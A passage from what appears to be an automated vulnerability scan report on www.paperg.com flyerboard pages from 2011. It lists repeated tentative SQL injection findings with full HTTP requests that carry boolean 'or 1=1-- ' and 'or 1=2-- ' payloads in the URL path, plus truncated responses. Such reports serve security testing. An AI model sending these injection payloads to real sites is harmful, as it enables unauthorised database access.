           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
   
...[SNIP]...

Request 2

GET /flyerboard/conifer-park/175314633334%20or%201%3d2--%20/45966.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.11. http://www.paperg.com/flyerboard/electrical-sub-code/3474/44819.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/electrical-sub-code/3474/44819.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16105332%20or%201%3d1--%20 and 16105332%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/electrical-sub-code/347416105332%20or%201%3d1--%20/44819.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5454
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - ELECTRICAL SUB-CODE - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "ELECTRICAL SUB-CODE" />
   
   <meta name="description" content = "The Township of Montclair is seeking a self-motivated individual to fill the position of Electrical Sub code Official in the Uniform Construction Division of..." />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/16602/0montclair130444957544819.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id=
...[SNIP]...

Request 2

GET /flyerboard/electrical-sub-code/347416105332%20or%201%3d2--%20/44819.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.12. http://www.paperg.com/flyerboard/helderberg-mountain/1552/43055.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/helderberg-mountain/1552/43055.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19975086%20or%201%3d1--%20 and 19975086%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/helderberg-mountain/155219975086%20or%201%3d1--%20/43055.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3918
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Helderberg Mountain - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Helderberg Mountain" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/20179/0altfair_h130339534443055.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></
...[SNIP]...

Request 2

GET /flyerboard/helderberg-mountain/155219975086%20or%201%3d2--%20/43055.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.13. http://www.paperg.com/flyerboard/mount--loretto/1753/45967.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/mount--loretto/1753/45967.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 55958003%20or%201%3d1--%20 and 55958003%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/mount--loretto/175355958003%20or%201%3d1--%20/45967.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3889
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Mount Loretto - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Mount Loretto" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/6730/3mt130513280445967.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       
...[SNIP]...

Request 2

GET /flyerboard/mount--loretto/175355958003%20or%201%3d2--%20/45967.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.14. http://www.paperg.com/flyerboard/mount-loretto/1552/45967.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/mount-loretto/1552/45967.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 86302656%20or%201%3d1--%20 and 86302656%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/mount-loretto/155286302656%20or%201%3d1--%20/45967.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3889
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Mount Loretto - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Mount Loretto" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/6730/3mt130513280445967.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       
...[SNIP]...

Request 2

GET /flyerboard/mount-loretto/155286302656%20or%201%3d2--%20/45967.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.15. http://www.paperg.com/flyerboard/northwoods-health/1552/45935.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/northwoods-health/1552/45935.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19317804%20or%201%3d1--%20 and 19317804%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/northwoods-health/155219317804%20or%201%3d1--%20/45935.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3900
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Northwoods Health - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Northwoods Health" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4068/0051211pat130512580345935.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
   
...[SNIP]...

Request 2

GET /flyerboard/northwoods-health/155219317804%20or%201%3d2--%20/45935.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.16. http://www.paperg.com/flyerboard/northwoods-health/1753/45935.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/northwoods-health/1753/45935.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14620622%20or%201%3d1--%20 and 14620622%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/northwoods-health/175314620622%20or%201%3d1--%20/45935.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3900
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Northwoods Health - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Northwoods Health" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4068/0051211pat130512580345935.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
   
...[SNIP]...

Request 2

GET /flyerboard/northwoods-health/175314620622%20or%201%3d2--%20/45935.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.17. http://www.paperg.com/flyerboard/nyprig/1552/45945.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/nyprig/1552/45945.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 69076538%20or%201%3d1--%20 and 69076538%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/nyprig/155269076538%20or%201%3d1--%20/45945.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3853
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NYPRIG - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "NYPRIG" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/20716/1050811nyp130512849245945.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!-- END
...[SNIP]...

Request 2

GET /flyerboard/nyprig/155269076538%20or%201%3d2--%20/45945.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
